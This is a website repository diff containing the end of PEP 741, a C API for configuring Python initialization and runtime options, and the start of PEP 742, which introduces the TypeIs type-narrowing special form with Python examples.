The vim project can target the stable ABI. Usually, the “system Python” +version is used. It’s not currently possible to select which Python +version to use. Users would like the ability to select a newer Python +on demand.

+

On Linux, another approach to deploy an application embedding Python, +such as GIMP, is to include Python in Flatpack, AppImage or Snap +“container”. In this case, the application brings its own copy of Python +version with the container.

+
+
+

Libraries embedding Python

+

Examples:

+ +
+
+

Utilities creating standalone applications

+ +

These utilities create standalone applications, they are not linked to +libpython.

+
+
+
+

Set the runtime configuration

+

Marc-André Lemburg requested +a C API to set the value of some configuration options at runtime:

+
    +
  • optimization_level
  • +
  • verbose
  • +
  • parser_debug
  • +
  • inspect
  • +
  • write_bytecode
  • +
+

Previously, it was possible to set directly global configuration +variables:

+
    +
  • Py_OptimizeFlag
  • +
  • Py_VerboseFlag
  • +
  • Py_DebugFlag
  • +
  • Py_InspectFlag
  • +
  • Py_DontWriteBytecodeFlag
  • +
+

But these configuration flags were deprecated in Python 3.12 and are +scheduled for removal in Python 3.14.

+
+
+
+

Specification

+

Add C API functions and structure to configure the Python +initialization:

+
    +
  • Create config:
      +
    • PyInitConfig opaque structure.
    • +
    • PyInitConfig_Create().
    • +
    • PyInitConfig_Free(config).
    • +
    +
  • +
  • Get options:
      +
    • PyInitConfig_HasOption(config, name).
    • +
    • PyInitConfig_GetInt(config, name, &value).
    • +
    • PyInitConfig_GetStr(config, name, &value).
    • +
    • PyInitConfig_GetStrList(config, name, &length, &items).
    • +
    • PyInitConfig_FreeStrList().
    • +
    +
  • +
  • Set options:
      +
    • PyInitConfig_SetInt(config, name, value).
    • +
    • PyInitConfig_SetStr(config, name, value).
    • +
    • PyInitConfig_SetStrList(config, name, length, items).
    • +
    • PyInitConfig_AddModule(config, name, initfunc)
    • +
    +
  • +
  • Initialize:
      +
    • Py_InitializeFromInitConfig(config).
    • +
    +
  • +
  • Error handling:
      +
    • PyInitConfig_GetError(config, &err_msg).
    • +
    • PyInitConfig_GetExitcode(config, &exitcode).
    • +
    +
  • +
+

Add C API functions to get and set the current runtime configuration:

+
    +
  • PyConfig_Get(name).
  • +
  • PyConfig_GetInt(name, &value).
  • +
  • PyConfig_Set(name).
  • +
  • PyConfig_Names().
  • +
+

The C API uses null-terminated UTF-8 encoded strings to refer to a +configuration option name.

+

These C API functions are excluded from the limited C API.

+
+

PyInitConfig structure

+

The PyInitConfig structure is implemented by combining the three +structures of the PyConfig API and has an inittab member as +well:

+
    +
  • PyPreConfig preconfig
  • +
  • PyConfig config
  • +
  • PyStatus status
  • +
  • struct _inittab *inittab for PyInitConfig_AddModule()
  • +
+

The PyStatus status is no longer separated, but part of the unified +PyInitConfig structure, which makes the API easier to use.

+
+
+

Configuration Options

+

Configuration options are named after PyPreConfig and PyConfig +structure members. See the PyPreConfig documentation and +the PyConfig documentation.

+

Deprecating and removing configuration options is out of the scope of +the PEP and should be discussed on a case by case basis.

+
+

Public configuration options

+

Following options can be get by PyConfig_Get() and set and +PyConfig_Set().

+ +++++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
OptionTypeComment
argvlist[str]API: sys.argv.
base_exec_prefixstrAPI: sys.base_exec_prefix.
base_executablestrAPI: sys._base_executable.
base_prefixstrAPI: sys.base_prefix.
bytes_warningintAPI: sys.flags.bytes_warning.
exec_prefixstrAPI: sys.exec_prefix.
executablestrAPI: sys.executable.
inspectboolAPI: sys.flags.inspect (int).
int_max_str_digitsintAPI: sys.flags.int_max_str_digits, +sys.get_int_max_str_digits() and +sys.set_int_max_str_digits().
interactiveboolAPI: sys.flags.interactive.
module_search_pathslist[str]API: sys.path.
optimization_levelintAPI: sys.flags.optimize.
parser_debugboolAPI: sys.flags.debug (int).
platlibdirstrAPI: sys.platlibdir.
prefixstrAPI: sys.base_prefix.
pycache_prefixstrAPI: sys.pycache_prefix.
quietboolAPI: sys.flags.quiet (int).
stdlib_dirstrAPI: sys._stdlib_dir.
use_environmentboolAPI: sys.flags.ignore_environment (int).
verboseintAPI: sys.flags.verbose.
warnoptionslist[str]API: sys.warnoptions.
write_bytecodeboolAPI: sys.flags.dont_write_bytecode (int) and sys.dont_write_bytecode (bool).
xoptionsdict[str, str]API: sys._xoptions.
+

Some option names are different than sys attributes, such as +optimization_level option and sys.flags.optimize attribute. +PyConfig_Set() sets the corresponding sys attribute.

+

The xoptions is a list of strings in PyInitConfig where each +string has the format key (value is True implicitly) or +key=value. In the current runtime configuration, it becomes a +dictionary (key: strvalue: str | True).

+
+
+

Read-only configuration options

+

Following options can be get by PyConfig_Get(), but cannot be set by +PyConfig_Set().

+ +++++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
OptionTypeComment
allocatorint
buffered_stdiobool
check_hash_pycs_modestr
code_debug_rangesbool
coerce_c_localebool
coerce_c_locale_warnbool
configure_c_stdiobool
configure_localebool
cpu_countintAPI: os.cpu_count() (int | None).
dev_modeboolAPI: sys.flags.dev_mode.
dump_refsbool
dump_refs_filestr
faulthandlerboolAPI: faulthandler.is_enabled().
filesystem_encodingstrAPI: sys.getfilesystemencoding().
filesystem_errorsstrAPI: sys.getfilesystemencodeerrors().
hash_seedint
homestr
import_timebool
install_signal_handlersbool
isolatedboolAPI: sys.flags.isolated (int).
legacy_windows_fs_encodingboolWindows only.
legacy_windows_stdioboolWindows only.
malloc_statsbool
orig_argvlist[str]API: sys.orig_argv.
parse_argvbool
pathconfig_warningsbool
perf_profilingboolAPI: sys.is_stack_trampoline_active().
program_namestr
run_commandstr
run_filenamestr
run_modulestr
run_presitestrneed a debug build.
safe_pathbool
show_ref_countbool
site_importboolAPI: sys.flags.no_site (int).
skip_source_first_linebool
stdio_encodingstrAPI: sys.stdin.encoding, sys.stdout.encoding and +sys.stderr.encoding.
stdio_errorsstrAPI: sys.stdin.errors, sys.stdout.errors and +sys.stderr.errors.
tracemallocintAPI: tracemalloc.is_tracing() (bool).
use_frozen_modulesbool
use_hash_seedbool
user_site_directoryboolAPI: sys.flags.no_user_site (int).
utf8_modebool
warn_default_encodingbool
_pystatsboolAPI: sys._stats_on(), sys._stats_off(). +Need a Py_STATS build.
+
+
+
+

Create Config

+
+
PyInitConfig structure:
Opaque structure to configure the Python preinitialization and the +Python initialization.
+
PyInitConfig* PyInitConfig_Create(void):
Create a new initialization configuration using default values +of the Isolated Configuration.

It must be freed with PyInitConfig_Free().

+

Return NULL on memory allocation failure.

+
+
void PyInitConfig_Free(PyInitConfig *config):
Free memory of an initialization configuration.
+
+
+
+

Get Options

+

The configuration option name parameter must be a non-NULL +null-terminated UTF-8 encoded string.

+
+
int PyInitConfig_HasOption(PyInitConfig *config, const char *name):
Test if the configuration has an option called name.

Return 1 if the option exists, or return 0 otherwise.

+
+
int PyInitConfig_GetInt(PyInitConfig *config, const char *name, int64_t *value):
Get an integer configuration option.
    +
  • Set *value, and return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+
+
int PyInitConfig_GetStr(PyInitConfig *config, const char *name, char **value):
Get a string configuration option as a null-terminated UTF-8 +encoded string.
    +
  • Set *value, and return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+

On success, the string must be released with free(value).

+
+
int PyInitConfig_GetStrList(PyInitConfig *config, const char *name, size_t *length, char ***items):
Get a string list configuration option as an array of +null-terminated UTF-8 encoded strings.
    +
  • Set *length and *value, and return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+

On success, the string list must be released with +PyInitConfig_FreeStrList(length, items).

+
+
void PyInitConfig_FreeStrList(size_t length, char **items):
Free memory of a string list created by +PyInitConfig_GetStrList().
+
+
+
+

Set Options

+

The configuration option name parameter must be a non-NULL +null-terminated UTF-8 encoded string.

+

Some configuration options have side effects on other options. This +logic is only implemented when Py_InitializeFromInitConfig() is +called, not by the “Set” functions below. For example, setting +dev_mode to 1 does not set faulthandler to 1.

+
+
int PyInitConfig_SetInt(PyInitConfig *config, const char *name, int64_t value):
Set an integer configuration option.
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+
+
int PyInitConfig_SetStr(PyInitConfig *config, const char *name, const char *value):
Set a string configuration option from a null-terminated UTF-8 +encoded string. The string is copied.
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+
+
int PyInitConfig_SetStrList(PyInitConfig *config, const char *name, size_t length, char * const *items):
Set a string list configuration option from an array of +null-terminated UTF-8 encoded strings. The string list is copied.
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+
+
int PyInitConfig_AddModule(PyInitConfig *config, const char *name, PyObject* (*initfunc)(void)):
Add a built-in extension module to the table of built-in modules.

The new module can be imported by the name name, and uses the +function initfunc as the initialization function called on the +first attempted import.

+
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
+

If Python is initialized multiple times, +PyInitConfig_AddModule() must be called at each Python +initialization.

+

Similar to the PyImport_AppendInittab() function.

+
+
+
+
+

Initialize Python

+
+
int Py_InitializeFromInitConfig(PyInitConfig *config):
Initialize Python from the initialization configuration.
    +
  • Return 0 on success.
  • +
  • Set an error in config and return -1 on error.
  • +
  • Set an exit code in config and return -1 if Python wants to +exit.
  • +
+

See PyInitConfig_GetExitcode() for the exitcode case.

+
+
+
+
+

Error Handling

+
+
int PyInitConfig_GetError(PyInitConfig* config, const char **err_msg):
Get the config error message.
    +
  • Set *err_msg and return 1 if an error is set.
  • +
  • Set *err_msg to NULL and return 0 otherwise.
  • +
+

An error message is an UTF-8 encoded string.

+

If config has an exit code, format the exit code as an error +message.

+

The error message remains valid until another PyInitConfig +function is called with config. The caller doesn’t have to free the +error message.

+
+
int PyInitConfig_GetExitcode(PyInitConfig* config, int *exitcode):
Get the config exit code.
    +
  • Set *exitcode and return 1 if Python wants to exit.
  • +
  • Return 0 if config has no exit code set.
  • +
+

Only the Py_InitializeFromInitConfig() function can set an exit +code if the parse_argv option is non-zero.

+

An exit code can be set when parsing the command line failed (exit +code 2) or when a command line option asks to display the command +line help (exit code 0).

+
+
+
+
+

Get and Set the Runtime Configuration

+

The configuration option name parameter must be a non-NULL +null-terminated UTF-8 encoded string.

+
+
PyObject* PyConfig_Get(const char *name):
Get the current runtime value of a configuration option as a Python +object.
    +
  • Return a new reference on success.
  • +
  • Set an exception and return NULL on error.
  • +
+

The object type depends on the option: see Configuration Options +tables.

+

Other options are get from internal PyPreConfig and PyConfig structures.

+

The caller must hold the GIL. The function cannot be called before +Python initialization nor after Python finalization.

+
+
int PyConfig_GetInt(const char *name, int *value):
Similar to PyConfig_Get(), but get the value as an integer.
    +
  • Set *value and return 0 success.
  • +
  • Set an exception and return -1 on error.
  • +
+
+
PyObject* PyConfig_Names(void):
Get all configuration option names as a frozenset.

Set an exception and return NULL on error.

+

The caller must hold the GIL.

+
+
PyObject* PyConfig_Set(const char *name, PyObject *value):
Set the current runtime value of a configuration option.
    +
  • Raise a ValueError if there is no option name.
  • +
  • Raise a ValueError if value is an invalid value.
  • +
  • Raise a ValueError if the option is read-only: cannot be set.
  • +
  • Raise a TypeError if value has not the proper type.
  • +
+

Read-only configuration options cannot be set.

+

The caller must hold the GIL. The function cannot be called before +Python initialization nor after Python finalization.

+
+
+
+
+

Stability

+

The behavior of options, the default option values, and the Python +behavior can change at each Python version: they are not “stable”.

+

Moreover, configuration options can be added, deprecated and removed +following the usual PEP 387 deprecation process.

+
+
+

Interaction with the PyPreConfig and PyConfig APIs

+

The lower level PEP 587 PyPreConfig and PyConfig APIs remain +available and fully supported. As noted in the Abstract, they remain the +preferred approach for embedding use cases that are aiming to closely +emulate the behaviour of the full CPython CLI, rather than just making a +Python runtime available as part of a larger application.

+

The PyPreConfig APIs may be used in combination with the +initialization API in this PEP. In such cases, the read-only vs +read/write restrictions for preconfiguration settings apply to +PyInitConfig_SetInt in addition to PyConfig_Set once the +interpreter has been preconfigured (specifically, only +use_environment may be updated, attempting to update any of the +other preconfiguration variables will report an error).

+
+
+
+

Examples

+
+

Initialize Python

+

Example initializing Python, set configuration options of various types, +return -1 on error:

+
int init_python(void)
+{
+    PyInitConfig *config = PyInitConfig_Create();
+    if (config == NULL) {
+        printf("PYTHON INIT ERROR: memory allocation failed\n");
+        return -1;
+    }
+
+    // Set an integer (dev mode)
+    if (PyInitConfig_SetInt(config, "dev_mode", 1) < 0) {
+        goto error;
+    }
+
+    // Set a list of UTF-8 strings (argv)
+    char *argv[] = {"my_program", "-c", "pass"};
+    if (PyInitConfig_SetStrList(config, "argv",
+                                 Py_ARRAY_LENGTH(argv), argv) < 0) {
+        goto error;
+    }
+
+    // Set a UTF-8 string (program name)
+    if (PyInitConfig_SetStr(config, "program_name", L"my_program") < 0) {
+        goto error;
+    }
+
+    // Initialize Python with the configuration
+    if (Py_InitializeFromInitConfig(config) < 0) {
+        goto error;
+    }
+    PyInitConfig_Free(config);
+    return 0;
+
+error:
+    // Display the error message
+    const char *err_msg;
+    (void)PyInitConfig_GetError(config, &err_msg);
+    printf("PYTHON INIT ERROR: %s\n", err_msg);
+    PyInitConfig_Free(config);
+
+    return -1;
+}
+
+
+
+
+

Increase initialization bytes_warning option

+

Example increasing the bytes_warning option of an initialization +configuration:

+
int config_bytes_warning(PyInitConfig *config)
+{
+    int64_t bytes_warning;
+    if (PyInitConfig_GetInt(config, "bytes_warning", &bytes_warning)) {
+        return -1;
+    }
+    bytes_warning += 1;
+    if (PyInitConfig_SetInt(config, "bytes_warning", bytes_warning)) {
+        return -1;
+    }
+    return 0;
+}
+
+
+
+
+

Get the runtime verbose option

+

Example getting the current runtime value of the configuration option +verbose:

+
int get_verbose(void)
+{
+    int verbose;
+    if (PyConfig_GetInt("verbose", &verbose) < 0) {
+        // Silently ignore the error
+        PyErr_Clear();
+        return -1;
+    }
+    return verbose;
+}
+
+
+

On error, the function silently ignores the error and returns -1. In +practice, getting the verbose option cannot fail, unless a future +Python version removes the option.

+
+
+
+

Implementation

+ +
+
+

Backwards Compatibility

+

Changes are fully backward compatible. Only new APIs are added.

+

Existing API such as the PyConfig C API (PEP 587) are left +unchanged.

+
+
+

Rejected Ideas

+
+

Configuration as text

+

It was proposed to provide the configuration as text to make the API +compatible with the stable ABI and to allow custom options.

+

Example:

+
# integer
+bytes_warning = 2
+
+# string
+filesystem_encoding = "utf8"   # comment
+
+# list of strings
+argv = ['python', '-c', 'code']
+
+
+

The API would take the configuration as a string, not as a file. Example +with a hypothetical PyInit_SetConfig() function:

+
void stable_abi_init_demo(int set_path)
+{
+    PyInit_SetConfig(
+        "isolated = 1\n"
+        "argv = ['python', '-c', 'code']\n"
+        "filesystem_encoding = 'utf-8'\n"
+    );
+    if (set_path) {
+        PyInit_SetConfig("pythonpath = '/my/path'");
+    }
+}
+
+
+

The example ignores error handling to make it easier to read.

+

The problem is that generating such configuration text requires adding +quotes to strings and to escape quotes in strings. Formatting an array +of strings becomes non-trivial.

+

Providing an API to format a string or an array of strings is not really +worth it, whereas Python can provide directly an API to set a +configuration option where the value is passed directly as a string or +an array of strings. It avoids giving special meaning to some +characters, such as newline characters, which would have to be escaped.

+
+
+

Refer to an option with an integer

+

Using strings to refer to a configuration option requires comparing +strings which can be slower than comparing integers.

+

Use integers, similar to type “slots” such as Py_tp_doc, to refer to +a configuration option. The const char *name parameter is replaced +with int option.

+

Accepting custom options is more likely to cause conflicts when using +integers, since it’s harder to maintain “namespaces” (ranges) for +integer options. Using strings, a simple prefix with a colon separator +can be used.

+

Integers also requires maintaining a list of integer constants and so +make the C API and the Python API larger.

+

Python 3.13 only has around 62 configuration options, and so performance +is not really a blocker issue. If better performance is needed later, a +hash table can be used to get an option by its name.

+

If getting a configuration option is used in hot code, the value can be +read once and cached. By the way, most configuration options cannot be +changed at runtime.

+
+
+

Multi-phase initialization (similar to PEP 432)

+

Eric Snow expressed concerns +that this proposal might reinforce with embedders the idea that +initialization is a single monolithic step. He argued that initialization +involves 5 distinct phases and even suggested that the API should +reflect this explicitly. Eric proposed that, at the very least, the +implementation of initialization should reflect the phases, in part +for improved code health. Overall, his explanation has some +similarities with PEP 432 and PEP 587.

+

Another of Eric’s key points relevant to this PEP was that, ideally, +the config passed to Py_InitializeFromConfig() should be complete +before that function is called, whereas currently initialization +actually modifies the config.

+

While Eric wasn’t necessarily suggesting an alternative to PEP 741, +any proposal to add a granular initialization API around phases is +effectively the opposite of what this PEP is trying to accomplish. +Such API is more complicated, it requires adding new public structures +and new public functions. It makes the Python initialization more +complicated, rather than this PEP tries to unify existing APIs and make +them simpler (the opposite). Having multiple structures for similar +purpose can lead to duplicate members, similar issue than duplicated +members between existing PyPreConfig and PyConfig structures.

+
+
+

Locale encoding and wide strings

+

Accepting strings encoded to the locale encoding and accepting wide +strings (wchar_t*) in the PyInitConfig API was deferred to keep +the PyInitConfig API simple and avoid the complexity of the Python +preinitialization. These features are also mostly needed when emulating +the full CPython CLI behaviour, and hence better served by the lower +level PEP 587 API.

+
+
+
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0741.rst

+

Last modified: 2024-09-03 13:37:25 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0742/index.html b/pep-0742/index.html new file mode 100644 index 00000000000..f85f83beb2c --- /dev/null +++ b/pep-0742/index.html @@ -0,0 +1,635 @@ + + + + + + + + PEP 742 – Narrowing types with TypeIs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 742 – Narrowing types with TypeIs

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
07-Feb-2024
+
Python-Version:
+
3.13
+
Post-History:
+
11-Feb-2024
+
Replaces:
+
724
+
Resolution:
+
03-Apr-2024
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see TypeIs and +typing.TypeIs for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP proposes a new special form, TypeIs, to allow annotating functions that can be used +to narrow the type of a value, similar to the builtin isinstance(). Unlike the existing +typing.TypeGuard special form, TypeIs can narrow the type in both the if +and else branches of a conditional.

+
+
+

Motivation

+

Typed Python code often requires users to narrow the type of a variable based on a conditional. +For example, if a function accepts a union of two types, it may use an isinstance() check +to discriminate between the two types. Type checkers commonly support type narrowing based on various +builtin function and operations, but occasionally, it is useful to use a user-defined function to +perform type narrowing.

+

To support such use cases, PEP 647 introduced the typing.TypeGuard special form, which +allows users to define type guards:

+
from typing import assert_type, TypeGuard
+
+def is_str(x: object) -> TypeGuard[str]:
+    return isinstance(x, str)
+
+def f(x: object) -> None:
+    if is_str(x):
+        assert_type(x, str)
+    else:
+        assert_type(x, object)
+
+
+

Unfortunately, the behavior of typing.TypeGuard has some limitations that make it +less useful for many common use cases, as explained also in the “Motivation” section of PEP 724. +In particular:

+
    +
  • Type checkers must use exactly the TypeGuard return type as the narrowed type if the +type guard returns True. They cannot use pre-existing knowledge about the type of the +variable.
  • +
  • In the case where the type guard returns False, the type checker cannot apply any +additional narrowing.
  • +
+

The standard library function inspect.isawaitable() may serve as an example. It +returns whether the argument is an awaitable object, and +typeshed +currently annotates it as:

+
def isawaitable(object: object) -> TypeGuard[Awaitable[Any]]: ...
+
+
+

A user reported an issue to mypy about +the behavior of this function. They observed the following behavior:

+
import inspect
+from collections.abc import Awaitable
+from typing import reveal_type
+
+async def f(t: Awaitable[int] | int) -> None:
+    if inspect.isawaitable(t):
+        reveal_type(t)  # Awaitable[Any]
+    else:
+        reveal_type(t)  # Awaitable[int] | int
+
+
+

This behavior is consistent with PEP 647, but it did not match the user’s expectations. +Instead, they would expect the type of t to be narrowed to Awaitable[int] in the if +branch, and to int in the else branch. This PEP proposes a new construct that does +exactly that.

+

Other examples of issues that arose out of the current behavior of TypeGuard include:

+ +
+
+

Rationale

+

The problems with the current behavior of typing.TypeGuard compel us to improve +the type system to allow a different type narrowing behavior. PEP 724 proposed to change +the behavior of the existing typing.TypeGuard construct, but we believe +that the backwards compatibility implications of that change are too severe. Instead, we propose +adding a new special form with the desired semantics.

+

We acknowledge that this leads to an unfortunate situation where there are two constructs with +a similar purpose and similar semantics. We believe that users are more likely to want the behavior +of TypeIs, the new form proposed in this PEP, and therefore we recommend that documentation +emphasize TypeIs over TypeGuard as a more commonly applicable tool. However, the semantics of +TypeGuard are occasionally useful, and we do not propose to deprecate or remove it. In the long +run, most users should use TypeIs, and TypeGuard should be reserved for rare cases +where its behavior is specifically desired.

+
+
+

Specification

+

A new special form, TypeIs, is added to the typing +module. Its usage, behavior, and runtime implementation are similar to +those of typing.TypeGuard.

+

It accepts a single +argument and can be used as the return type of a function. A function annotated as returning a +TypeIs is called a type narrowing function. Type narrowing functions must return bool +values, and the type checker should verify that all return paths return +bool.

+

Type narrowing functions must accept at least one positional argument. The type +narrowing behavior is applied to the first positional argument passed to +the function. The function may accept additional arguments, but they are +not affected by type narrowing. If a type narrowing function is implemented as +an instance method or class method, the first positional argument maps +to the second parameter (after self or cls).

+
+

Type narrowing behavior

+

To specify the behavior of TypeIs, we use the following terminology:

+
    +
  • I = TypeIs input type
  • +
  • R = TypeIs return type
  • +
  • A = Type of argument passed to type narrowing function (pre-narrowed)
  • +
  • NP = Narrowed type (positive; used when TypeIs returned True)
  • +
  • NN = Narrowed type (negative; used when TypeIs returned False)
  • +
+
def narrower(x: I) -> TypeIs[R]: ...
+
+def func1(val: A):
+    if narrower(val):
+        assert_type(val, NP)
+    else:
+        assert_type(val, NN)
+
+
+

The return type R must be consistent with I. The type checker should +emit an error if this condition is not met.

+

Formally, type NP should be narrowed to AR, +the intersection of A and R, and type NN should be narrowed to +A∧¬R, the intersection of A and the complement of R. +In practice, the theoretic types for strict type guards cannot be expressed +precisely in the Python type system. Type checkers should fall back on +practical approximations of these types. As a rule of thumb, a type checker +should use the same type narrowing logic – and get results that are consistent +with – its handling of isinstance(). This guidance allows for changes and +improvements if the type system is extended in the future.

+
+
+

Examples

+

Type narrowing is applied in both the positive and negative case:

+
from typing import TypeIs, assert_type
+
+def is_str(x: object) -> TypeIs[str]:
+    return isinstance(x, str)
+
+def f(x: str | int) -> None:
+    if is_str(x):
+        assert_type(x, str)
+    else:
+        assert_type(x, int)
+
+
+

The final narrowed type may be narrower than R, due to the constraints of the +argument’s previously-known type:

+
from collections.abc import Awaitable
+from typing import Any, TypeIs, assert_type
+import inspect
+
+def isawaitable(x: object) -> TypeIs[Awaitable[Any]]:
+    return inspect.isawaitable(x)
+
+def f(x: Awaitable[int] | int) -> None:
+    if isawaitable(x):
+        # Type checkers may also infer the more precise type
+        # "Awaitable[int] | (int & Awaitable[Any])"
+        assert_type(x, Awaitable[int])
+    else:
+        assert_type(x, int)
+
+
+

It is an error to narrow to a type that is not consistent with the input type:

+
from typing import TypeIs
+
+def is_str(x: int) -> TypeIs[str]:  # Type checker error
+    ...
+
+
+
+
+

Subtyping

+

TypeIs is also valid as the return type of a callable, for example +in callback protocols and in the Callable special form. In these +contexts, it is treated as a subtype of bool. For example, Callable[..., TypeIs[int]] +is assignable to Callable[..., bool].

+

Unlike TypeGuard, TypeIs is invariant in its argument type: +TypeIs[B] is not a subtype of TypeIs[A], +even if B is a subtype of A. +To see why, consider the following example:

+
def takes_narrower(x: int | str, narrower: Callable[[object], TypeIs[int]]):
+    if narrower(x):
+        print(x + 1)  # x is an int
+    else:
+        print("Hello " + x)  # x is a str
+
+def is_bool(x: object) -> TypeIs[bool]:
+    return isinstance(x, bool)
+
+takes_narrower(1, is_bool)  # Error: is_bool is not a TypeIs[int]
+
+
+

(Note that bool is a subtype of int.) +This code fails at runtime, because the narrower returns False (1 is not a bool) +and the else branch is taken in takes_narrower(). +If the call takes_narrower(1, is_bool) was allowed, type checkers would fail to +detect this error.

+
+
+
+

Backwards Compatibility

+

As this PEP only proposes a new special form, there are no implications on +backwards compatibility.

+
+
+

Security Implications

+

None known.

+
+
+

How to Teach This

+

Introductions to typing should cover TypeIs when discussing how to narrow types, +along with discussion of other narrowing constructs such as isinstance(). The +documentation should emphasize TypeIs over typing.TypeGuard; while the +latter is not being deprecated and its behavior is occasionally useful, we expect that the +behavior of TypeIs is usually more intuitive, and most users should reach for +TypeIs first. The rest of this section contains some example content that could +be used in introductory user-facing documentation.

+
+

When to use TypeIs

+

Python code often uses functions like isinstance() to distinguish between +different possible types of a value. Type checkers understand isinstance() +and various other checks and use them to narrow the type of a variable. However, +sometimes you want to reuse a more complicated check in multiple places, or +you use a check that the type checker doesn’t understand. In these cases, you +can define a TypeIs function to perform the check and allow type checkers +to use it to narrow the type of a variable.

+

A TypeIs function takes a single argument and is annotated as returning +TypeIs[T], where T is the type that you want to narrow to. The function +must return True if the argument is of type T, and False otherwise. +The function can then be used in if checks, just like you would use isinstance(). +For example:

+
from typing import TypeIs, Literal
+
+type Direction = Literal["N", "E", "S", "W"]
+
+def is_direction(x: str) -> TypeIs[Direction]:
+    return x in {"N", "E", "S", "W"}
+
+def maybe_direction(x: str) -> None:
+    if is_direction(x):
+        print(f"{x} is a cardinal direction")
+    else:
+        print(f"{x} is not a cardinal direction")
+
+
+
+
+

Writing a safe TypeIs function

+

A TypeIs function allows you to override your type checker’s type narrowing +behavior. This is a powerful tool, but it can be dangerous because an incorrectly +written TypeIs function can lead to unsound type checking, and type checkers +cannot detect such errors.

+

For a function returning TypeIs[T] to be safe, it must return True if and only if +the argument is compatible with type T, and False otherwise. If this condition is +not met, the type checker may infer incorrect types.

+

Below are some examples of correct and incorrect TypeIs functions:

+
from typing import TypeIs
+
+# Correct
+def good_typeis(x: object) -> TypeIs[int]:
+    return isinstance(x, int)
+
+# Incorrect: does not return True for all ints
+def bad_typeis1(x: object) -> TypeIs[int]:
+    return isinstance(x, int) and x > 0
+
+# Incorrect: returns True for some non-ints
+def bad_typeis2(x: object) -> TypeIs[int]:
+    return isinstance(x, (int, float))
+
+
+

This function demonstrates some errors that can occur when using a poorly written +TypeIs function. These errors are not detected by type checkers:

+
def caller(x: int | str, y: int | float) -> None:
+    if bad_typeis1(x):  # narrowed to int
+        print(x + 1)
+    else:  # narrowed to str (incorrectly)
+        print("Hello " + x)  # runtime error if x is a negative int
+
+    if bad_typeis2(y):  # narrowed to int
+        # Because of the incorrect TypeIs, this branch is taken at runtime if
+        # y is a float.
+        print(y.bit_count())  # runtime error: this method exists only on int, not float
+    else:  # narrowed to float (though never executed at runtime)
+        pass
+
+
+

Here is an example of a correct TypeIs function for a more complicated type:

+
from typing import TypedDict, TypeIs
+
+class Point(TypedDict):
+    x: int
+    y: int
+
+def is_point(x: object) -> TypeIs[Point]:
+    return (
+        isinstance(x, dict)
+        and all(isinstance(key, str) for key in x)
+        and "x" in x
+        and "y" in x
+        and isinstance(x["x"], int)
+        and isinstance(x["y"], int)
+    )
+
+
+
+
+

TypeIs and TypeGuard

+

TypeIs and typing.TypeGuard are both tools for narrowing the type of a variable +based on a user-defined function. Both can be used to annotate functions that take an +argument and return a boolean depending on whether the input argument is compatible with +the narrowed type. These function can then be used in if checks to narrow the type +of a variable.

+

TypeIs usually has the most intuitive behavior, but it +introduces more restrictions. TypeGuard is the right tool to use if:

+
    +
  • You want to narrow to a type that is not compatible with the input type, for example +from list[object] to list[int]. TypeIs only allows narrowing between +compatible types.
  • +
  • Your function does not return True for all input values that are compatible with +the narrowed type. For example, you could have a TypeGuard[int] that returns True +only for positive integers.
  • +
+

TypeIs and TypeGuard differ in the following ways:

+
    +
  • TypeIs requires the narrowed type to be a subtype of the input type, while +TypeGuard does not.
  • +
  • When a TypeGuard function returns True, type checkers narrow the type of the +variable to exactly the TypeGuard type. When a TypeIs function returns True, +type checkers can infer a more precise type combining the previously known type of the +variable with the TypeIs type. (Technically, this is known as an intersection type.)
  • +
  • When a TypeGuard function returns False, type checkers cannot narrow the type of +the variable at all. When a TypeIs function returns False, type checkers can narrow +the type of the variable to exclude the TypeIs type.
  • +
+

This behavior can be seen in the following example:

+
from typing import TypeGuard, TypeIs, reveal_type, final
+
+class Base: ...
+class Child(Base): ...
+@final
+class Unrelated: ...
+
+def is_base_typeguard(x: object) -> TypeGuard[Base]:
+    return isinstance(x, Base)
+
+def is_base_typeis(x: object) -> TypeIs[Base]:
+    return isinstance(x, Base)
+
+def use_typeguard(x: Child | Unrelated) -> None:
+    if is_base_typeguard(x):
+        reveal_type(x)  # Base
+    else:
+        reveal_type(x)  # Child | Unrelated
+
+def use_typeis(x: Child | Unrelated) -> None:
+    if is_base_typeis(x):
+        reveal_type(x)  # Child
+    else:
+        reveal_type(x)  # Unrelated
+
+
+
+
+
+

Reference Implementation

+

The TypeIs special form has been implemented +in the typing_extensions module and will be released in typing_extensions 4.10.0.

+

Implementations are available for several type checkers:

+ +
+
+

Rejected Ideas

+
+

Change the behavior of TypeGuard

+

